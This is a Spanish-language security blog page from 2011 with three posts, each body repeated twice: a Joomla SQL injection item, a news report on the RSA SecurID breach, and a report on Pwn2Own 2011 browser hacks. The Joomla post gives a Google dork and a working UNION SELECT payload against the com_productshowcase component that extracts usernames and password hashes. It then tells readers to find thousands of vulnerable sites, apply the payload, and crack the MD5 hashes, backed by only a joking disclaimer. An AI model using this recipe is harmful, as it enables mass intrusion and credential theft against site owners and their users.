miércoles, 30 de marzo de 2011
sábado, 19 de marzo de 2011
Sql INjection en Joomla!
Se ha publicado una vulnerabilidad de inyección SQL que afecta a la rama 1.6.0 del popular gestor de contenidos Joomla. El fallo ha sido descubierto por Aung Khant que forma parte de 'YGN Ethical Hacker Group'.
Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.
El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.
Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:
DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/
Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)
Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.
El fallo fue puesto en conocimiento de Joomla el pasado 24 de enero y tuvo que esperar hasta principios de marzo para que fuera publicada una actualización que solucionase este fallo de seguridad, concretamente la versión 1.6.1. El grupo ha esperado una semana desde la publicación de la actualización para hacer público el fallo, dando este plazo para que los usuarios lleven a cabo la actualización del mismo.
Se ha reportado un nuevo fallo en un componente de joomla, precisamente en com_productshowcase:
DORKS 1 : allinurl:"com_productshowcase"
EXPLOIT :index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
Tan simple como eso.... ponemos en google la Dork y econtraremos más de 2500 sitios vulnerables. Entonces simplemente nos queda: http:sitiovulnerable.com/EXPLOIT
Luego desencriptamos los passwords con algúnn cracker MD5 de esos que andan por la red... (por ejemplo http://gdataonline.com/seekhash.php
fuente
Tutorial en http://rincondetodo.mforos.com/1783698/9018427-tutorial-inyeccion-sql-en-joomla/
Comentario: Usarlo solo con fines experimentales, El autor del blog no se hace responsable por la interpretación de la información expuesta en el Sitio, ni de su uso indebido, o sea practiquen pero no rompan.- ;)
Etiquetas:
hacking,
inyeccion de sql,
joomla,
seguridad informatica
Hackearon a RSA
La división de seguridad de EMC, RSA, fué comprometida en su seguridad.
Art Coviello, director ejecutivo de RSA, explica en una carta abierta a los clientes de la compañía que sus sistemas de seguridad "identificaron un ciberataque extremadamente sofisticado en progreso" contra RSA. Tras tomar "una variedad de medidas agresivas contra la amenaza", comenzaron "una investigación exhaustiva del ataque". Además, Coviello asegura que están trabajando "con las autoridades apropiadas".
Esta investigación les ha llevado a la conclusión de que el ataque fue una Amenaza Avanzada Persistente. Asimismo, descubrieron que cierta información había sido sustraida.
Parte de la información robada está "específicamente relacionada" con los protocolos de autentificación SecurID de la empresa. Este sistema de seguridad se basa en una doble autentificación. Por un lado, se utiliza una contraseña que conoce el usuario y, por otro lado, una 'llave, un autentificador físico que proporciona una nueva contraseña que se cambia "cada 60 segundos".
Coviello también explica que no tienen pruebas de que ningún otro producto, tanto de RSA como de EMC, haya sido afectado por el ataque. Asimismo, no cree que se haya visto comprometida la información de ningún cliente o trabajador como resultado del ataque.
"Nuestra prioridad es garantizar la seguridad de los clientes y su confianza". Para ello, utilizarán "todos los recursos necesarios" para proporcionar a sus clientes las "herramientas, procesos y soporte" que necesiten para fortalecer la seguridad de sus sistemas.
Según explica Whitfield Diffie, especialista en seguridad informática, al New York Times, la 'master key o llave maestra', un número utilizado en el algoritmo de encriptación, podría haber sido robado.
Si este hubiera sido el caso, explica Diffie, podría utilizarse el código para duplicar las tarjetas y llaves que proporciona RSA, de modo que se podría obtener acceso a las redes y los sistemas informáticos de las empresas.
Comentarios: Si hubiese sido o no el caso es lo mismo, desde el mimo momento en que la empresa fué victima de un ataque, yo creo que ya se plantó la duda acerca de su efectividad como referencia en seguridad, al margen de esto , no debe confundirse este ciberataque a la division RSA con el sistema criptografico de clave pública RSA que lleva su nombre por sus creadores (Rivest, Shamir y Adleman) mas info acerca de este mismo en http://es.wikipedia.org/wiki/RSA .-
Art Coviello, director ejecutivo de RSA, explica en una carta abierta a los clientes de la compañía que sus sistemas de seguridad "identificaron un ciberataque extremadamente sofisticado en progreso" contra RSA. Tras tomar "una variedad de medidas agresivas contra la amenaza", comenzaron "una investigación exhaustiva del ataque". Además, Coviello asegura que están trabajando "con las autoridades apropiadas".
Esta investigación les ha llevado a la conclusión de que el ataque fue una Amenaza Avanzada Persistente. Asimismo, descubrieron que cierta información había sido sustraida.
Parte de la información robada está "específicamente relacionada" con los protocolos de autentificación SecurID de la empresa. Este sistema de seguridad se basa en una doble autentificación. Por un lado, se utiliza una contraseña que conoce el usuario y, por otro lado, una 'llave, un autentificador físico que proporciona una nueva contraseña que se cambia "cada 60 segundos".
Coviello también explica que no tienen pruebas de que ningún otro producto, tanto de RSA como de EMC, haya sido afectado por el ataque. Asimismo, no cree que se haya visto comprometida la información de ningún cliente o trabajador como resultado del ataque.
"Nuestra prioridad es garantizar la seguridad de los clientes y su confianza". Para ello, utilizarán "todos los recursos necesarios" para proporcionar a sus clientes las "herramientas, procesos y soporte" que necesiten para fortalecer la seguridad de sus sistemas.
Según explica Whitfield Diffie, especialista en seguridad informática, al New York Times, la 'master key o llave maestra', un número utilizado en el algoritmo de encriptación, podría haber sido robado.
Si este hubiera sido el caso, explica Diffie, podría utilizarse el código para duplicar las tarjetas y llaves que proporciona RSA, de modo que se podría obtener acceso a las redes y los sistemas informáticos de las empresas.
Comentarios: Si hubiese sido o no el caso es lo mismo, desde el mimo momento en que la empresa fué victima de un ataque, yo creo que ya se plantó la duda acerca de su efectividad como referencia en seguridad, al margen de esto , no debe confundirse este ciberataque a la division RSA con el sistema criptografico de clave pública RSA que lleva su nombre por sus creadores (Rivest, Shamir y Adleman) mas info acerca de este mismo en http://es.wikipedia.org/wiki/RSA .-
Etiquetas:
hackers,
RSA,
securID,
seguridad informatica
viernes, 11 de marzo de 2011
Pwn2Own primer día: Internet Explorer 8 y Safari hackeados
Tiene lugar por estos momentos la CanSecWest en Vancouver (Canadá), una conferencia mas de seguridad de las tantas que hay, igual? No, porque en esta conferencia en particular esta el Pwn2Own, el cual es una competición en la cual los participantes deben "hackear" determinadas aplicaciones, explotando algunas vulnerabilidades de las mismas y en caso de tener exito enviar un informe completo al fabricante para que puede ser parcheado en las proximas versiones, en este año 2011 los actores principales son los navegadores con la salvedad que Google ofrecio un premio al que lograse vulnerar a su naveghador estrella Chrome, si bien hace poco Google lanzo una actualizacion de seguridad para el mismo que corrige 24 vulnerabilidades, se espera que tambien Chrome sea una victima mas del ingenio de los participantes, por ahora ya han caido Internet Explorer 8 corriendo sobre un windows 7 con SP1 y Safari 5.0.3 sobre Mac OS X 10.6.6 .
La firma francesa de seguridad VUPEN que fue la primera en atacar y, en cinco segundos de exposición del navegador a una página cargada de código malicioso, logró ejecutar la calculadora y escribir un archivo en el disco duro del equipo.La siguió Stephen Fewer de Harmony Security que logró ejecutar la calculadora de Windows y escribir en el disco duro del equipo, mediante un ataque que, según este experto en seguridad, tardó cinco semanas en modelar y que explotaba, de manera conjunta, tres vulnerabilidades del navegador.
Hoy la competición se centrará en Firefox y los smartphones (iOS, Android, BlackBerry OS y Windows Phone 7).
Comentario: Yo probé la nueva versión de Chrome, lo que no me gustó fué que me avisó el sistema después que ya estaba instalada en mi equipo, y no antes, es decir "se tomo el atrevimiento" de hacerlo, debo revisar mis configuraciones de seguridad, y si no hubiese sido Chrome? Y si en cambio un troyano? Ojo.-
La firma francesa de seguridad VUPEN que fue la primera en atacar y, en cinco segundos de exposición del navegador a una página cargada de código malicioso, logró ejecutar la calculadora y escribir un archivo en el disco duro del equipo.La siguió Stephen Fewer de Harmony Security que logró ejecutar la calculadora de Windows y escribir en el disco duro del equipo, mediante un ataque que, según este experto en seguridad, tardó cinco semanas en modelar y que explotaba, de manera conjunta, tres vulnerabilidades del navegador.
Hoy la competición se centrará en Firefox y los smartphones (iOS, Android, BlackBerry OS y Windows Phone 7).
Comentario: Yo probé la nueva versión de Chrome, lo que no me gustó fué que me avisó el sistema después que ya estaba instalada en mi equipo, y no antes, es decir "se tomo el atrevimiento" de hacerlo, debo revisar mis configuraciones de seguridad, y si no hubiese sido Chrome? Y si en cambio un troyano? Ojo.-
Etiquetas:
chrome,
competencia,
explorer,
safari,
seguridad informatica
Suscribirse a:
Entradas (Atom)